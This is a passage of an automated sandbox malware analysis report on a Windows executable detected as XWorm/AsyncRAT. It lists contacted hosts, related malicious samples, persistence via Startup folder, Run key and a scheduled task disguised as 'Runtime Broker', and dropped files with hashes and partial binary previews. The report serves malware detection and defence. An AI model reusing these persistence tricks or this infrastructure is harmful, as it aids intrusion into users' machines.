                              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1844678858.0000021358544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945912327.00000240CC0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2099020934.000001823F812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000006.00000002.1821832936.00000213484D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F7B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC27681000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecoonfart.exe, 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821832936.00000213484D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F7B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC27681000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000001A.00000003.2517348187.000001A4D5EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                208.95.112.1
                                		ip-api.comUnited States
                                		53334TUT-ASUStrue
                                193.161.193.99
                                		unknownRussian Federation
                                		198134BITREE-ASRUfalse
                                104.20.4.235
                                		pastebin.comUnited States
                                		13335CLOUDFLARENETUStrue
                                143.178.83.216
                                		homebots.ioNetherlands
                                		50266TMOBILE-THUISNLfalse

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1532625
                                Start date and time:2024-10-13 19:10:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 12s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:28
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:80BvHOM51j.exe
                                renamed because original name is a hash value
                                Original Sample Name:2b89bba8e264ad85ed07127f63cc7a711e05867525e4143edddb06dc9bbf2f08.exe
                                Detection:MAL
                                Classification:mal100.troj.adwa.expl.evad.winEXE@32/30@3/5
                                EGA Information:
                                • Successful, ratio: 25%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 85
                                • Number of non-executed functions: 17
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target Runtime Broker, PID 7372 because it is empty
                                • Execution Graph export aborted for target coonfart.exe, PID 7720 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3288 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7492 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7780 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7948 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                13:11:10API Interceptor56x Sleep call for process: powershell.exe modified
                                13:12:11API Interceptor123x Sleep call for process: coonfart.exe modified
                                13:12:21API Interceptor2x Sleep call for process: OpenWith.exe modified
                                13:12:22API Interceptor2x Sleep call for process: svchost.exe modified
                                18:11:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.bat
                                18:11:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                18:12:10Task SchedulerRun new task: Runtime Broker path: C:\Users\Public\Runtime s>Broker
                                18:12:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Runtime Broker C:\Users\Public\Runtime Broker
                                18:12:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Runtime Broker C:\Users\Public\Runtime Broker
                                18:12:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                • ip-api.com/json/?fields=225545
                                s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                • ip-api.com/line/?fields=hosting
                                W1FREE.exeGet hashmaliciousXWormBrowse
                                • ip-api.com/line/?fields=hosting
                                Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                                • okmaq-24505.portmap.host:24505/
                                JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                                • exara32-64703.portmap.host:64703/
                                99SKW728vf.exeGet hashmaliciousRedLineBrowse
                                • lottie9nwtina-55339.portmap.host:55339/
                                amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                                • tete2792-22120.portmap.host:22120//

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pastebin.comjcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • 172.67.19.24
                                test.docGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                • 104.20.3.235
                                awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                • 172.67.19.24
                                egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                • 172.67.19.24
                                Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                • 104.20.4.235
                                eshkere.batGet hashmaliciousXmrigBrowse
                                • 104.20.4.235
                                frik.exeGet hashmaliciousXmrigBrowse
                                • 104.20.3.235
                                Google Chrome.exeGet hashmaliciousXmrigBrowse
                                • 172.67.19.24
                                SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                ip-api.comsB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                • 208.95.112.1
                                s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                • 208.95.112.1
                                W1FREE.exeGet hashmaliciousXWormBrowse
                                • 208.95.112.1
                                Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TMOBILE-THUISNLna.elfGet hashmaliciousUnknownBrowse
                                • 85.144.20.0
                                na.elfGet hashmaliciousMiraiBrowse
                                • 85.144.229.202
                                na.elfGet hashmaliciousMiraiBrowse
                                • 85.144.20.7
                                SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                                • 85.146.69.242
                                jade.m68k.elfGet hashmaliciousMiraiBrowse
                                • 85.144.229.200
                                SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elfGet hashmaliciousMiraiBrowse
                                • 85.144.20.3
                                yJrZoOsgfl.exeGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                WBmC56ADQF.lnkGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                uScqjqUS1m.exeGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                BITREE-ASRUjcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • 193.161.193.99
                                bfWVPQsRO1.exeGet hashmaliciousNjratBrowse
                                • 193.161.193.99
                                p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                • 193.161.193.99
                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                • 193.161.193.99
                                YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                • 193.161.193.99
                                WTB Middle East FZE 002124.jarGet hashmaliciousADWINDBrowse
                                • 193.161.193.99
                                WTB Middle East FZE 002121.jarGet hashmaliciousADWINDBrowse
                                • 193.161.193.99
                                Discord.exeGet hashmaliciousQuasarBrowse
                                • 193.161.193.99
                                NkxagQa6zn.exeGet hashmaliciousStormKitty, XWormBrowse
                                • 193.161.193.99
                                KNUaGHzY9V.exeGet hashmaliciousXWormBrowse
                                • 193.161.193.99
                                TUT-ASUSsB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                • 208.95.112.1
                                s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                • 208.95.112.1
                                W1FREE.exeGet hashmaliciousXWormBrowse
                                • 208.95.112.1
                                Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                kUFcZgip68.exeGet hashmaliciousAgentTeslaBrowse
                                • 208.95.112.1
                                CLOUDFLARENETUSjcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • 172.67.19.24
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                • 104.16.124.96
                                https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 172.66.0.235
                                https://f120987.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 104.16.124.96
                                https://japroippouquafou-5881.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.5.15
                                http://posegulefra-4459.vercel.app/mixcc.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.4.15
                                https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 104.16.124.96
                                https://shawri.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                • 162.247.243.29

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0esB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                • 104.20.4.235
                                jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                • 104.20.4.235
                                hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                • 104.20.4.235
                                hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                • 104.20.4.235
                                https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 104.20.4.235
                                https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 104.20.4.235
                                https://shawri.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                • 104.20.4.235
                                https://server.h74w.com/invite/12536668Get hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                https://scary-wave.surge.sh/appeal/Get hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                https://mail.flndmy-ld-usa.help/icloud-archivos/code2022esp.phpGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                37f463bf4616ecd445d4a1937da06e19C5u5BZq8gj.exeGet hashmaliciousVidarBrowse
                                • 143.178.83.216
                                hD2EOjfpfW.exeGet hashmaliciousVidarBrowse
                                • 143.178.83.216
                                cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                • 143.178.83.216
                                OceanicTools.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                • 143.178.83.216
                                v.1.6.3__x64__.msiGet hashmaliciousLegionLoaderBrowse
                                • 143.178.83.216
                                phantomtoolsv2.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                • 143.178.83.216
                                bot.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                • 143.178.83.216
                                narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                • 143.178.83.216
                                v.1.5.4__x64__.msiGet hashmaliciousLegionLoaderBrowse
                                • 143.178.83.216

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):1.3073797426099514
                                Encrypted:false
                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
                                MD5:8573BCE99A19C04A24593A7D3F4C0AEB
                                SHA1:74D27335846F41DE1F8C9311500787EF8C9ACD52
                                SHA-256:423F91E0CC329BFCA8125373FFBA2F67B479D675F697C0998ACCC4D57B6F682B
                                SHA-512:F81FCB4CE9CC328B68109185562E3190718F9D97E06464574810124B12F28A8CC00902F1D6B98B30B32E954FFB3C2992C108527C5B882364F0F148D5F39025BD
                                Malicious:false
                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0e042e1b, page size 16384, DirtyShutdown, Windows version 10.0
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.42217415317834384
                                Encrypted:false
                                SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                MD5:8514000E736146328440E3026CCDC841
                                SHA1:636A86113BC87FE626A2B8F35AA9B0FA1566B2E1
                                SHA-256:6C4F20FF34D1E0B0331DF54B754E01EB5358E9091936D2D1B3F38D84D0514E4A
                                SHA-512:584D15BB085A761CE789F29249F0483885B4371A686FF1A2E6629E1FC3003E97CCF8F4E66AF17FE38DCAAB6DCB74AA59F4292B43C8EBF8E1AC9E4CF7979E12EA
                                Malicious:false
                                Preview:....... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..........................................|.................._-r......|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.07693789839289306
                                Encrypted:false
                                SSDEEP:3:iyYeEVSn5ejjn13a/VXZEvillcVO/lnlZMxZNQl:iyz8CAj53q9ZJOewk
                                MD5:BA322AF36C2B4D92020C576817B805E6
                                SHA1:3A93433CF01CDAD2D3287C793DB37DF5CAA7A990
                                SHA-256:EB57697352840B8CBEBBEDB1E284F2DA3483E1FE73A2BB5D55DC071C58F54C7B
                                SHA-512:1995D9BBF0B39E0465C7409AC174970D35E448B78A72E911B071F7387100172ABF04F46005D1893975DC19281C15635AC5559ADE0575F7C724C9C5250E114CDF
                                Malicious:false
                                Preview:ln.......................................;...{.......|.......{A..............{A......{A..........{A]................_-r......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\Public\Runtime Broker

                                Download File
                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):174080
                                Entropy (8bit):4.6925997112201365
                                Encrypted:false
                                SSDEEP:1536:oEYwMHUIf/NFDawQTQTwxz5qbTrfKT3B6UlotQFO5uSyEIE4:xl4NFhQiw15qbTevWqO5HhIE4
                                MD5:A9D1FD427561A90037A112B99EDD9D14
                                SHA1:A9B63FFBF0CA8B852C9B23955515684DF4F32DED
                                SHA-256:F25374E1808122200507AE53DE2425884EF5C497CBD9D75A96E8ACC6C5AE5F4B
                                SHA-512:8FCDBDECE6B2AF556E87F70B8621E68BFFDC17CFB98411343988BFBF9E16ACC5376D17568C63F88936FBC6E004E3A0E154F7C537691E4A66B02B5DCB88EA0F9E
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Runtime Broker, Author: Joe Security
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\Runtime Broker, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Runtime Broker, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 81%
                                • Antivirus: Virustotal, Detection: 66%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..g.............................)... ...@....@.. ....................................@..................................)..W....@............................................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc..............................@..B.................)......H........c..........&.....................................................(....*.r...p*. .O..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*.r...p*. K...*.rI..p*. .}..*.r...p*. ..e.*.r...p*. ..v.*..((...*.r,..p*. S...*.r~..p*. .(h.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&(....&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.r...p*. *Z..*.r2..p*. ....*.r...p*. ..?.*.r...p*. .?N.*.r(..p*. .|..*.rz..p*. ..2.*.r...p*. .(

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broker.log

                                Download File
                                Process:C:\Users\Public\Runtime Broker
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):654
                                Entropy (8bit):5.380476433908377
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\coonfart.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):654
                                Entropy (8bit):5.380476433908377
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]

                                Download File
                                Process:C:\Users\user\Desktop\80BvHOM51j.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):174080
                                Entropy (8bit):4.6925997112201365
                                Encrypted:false
                                SSDEEP:1536:oEYwMHUIf/NFDawQTQTwxz5qbTrfKT3B6UlotQFO5uSyEIE4:xl4NFhQiw15qbTevWqO5HhIE4
                                MD5:A9D1FD427561A90037A112B99EDD9D14
                                SHA1:A9B63FFBF0CA8B852C9B23955515684DF4F32DED
                                SHA-256:F25374E1808122200507AE53DE2425884EF5C497CBD9D75A96E8ACC6C5AE5F4B
                                SHA-512:8FCDBDECE6B2AF556E87F70B8621E68BFFDC17CFB98411343988BFBF9E16ACC5376D17568C63F88936FBC6E004E3A0E154F7C537691E4A66B02B5DCB88EA0F9E
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], Author: Joe Security
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 81%
                                • Antivirus: Virustotal, Detection: 66%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..g.............................)... ...@....@.. ....................................@..................................)..W....@............................................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc..............................@..B.................)......H........c..........&.....................................................(....*.r...p*. .O..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*.r...p*. K...*.rI..p*. .}..*.r...p*. ..e.*.r...p*. ..v.*..((...*.r,..p*. S...*.r~..p*. .(h.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&(....&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.r...p*. *Z..*.r2..p*. ....*.r...p*. ..?.*.r...p*. .?N.*.r(..p*. .|..*.rz..p*. ..2.*.r...p*. .(

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):64
                                Entropy (8bit):0.34726597513537405
                                Encrypted:false
                                SSDEEP:3:Nlll:Nll
                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                Malicious:false
                                Preview:@...e...........................................................

                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):41
                                Entropy (8bit):3.7195394315431693
                                Encrypted:false
                                SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
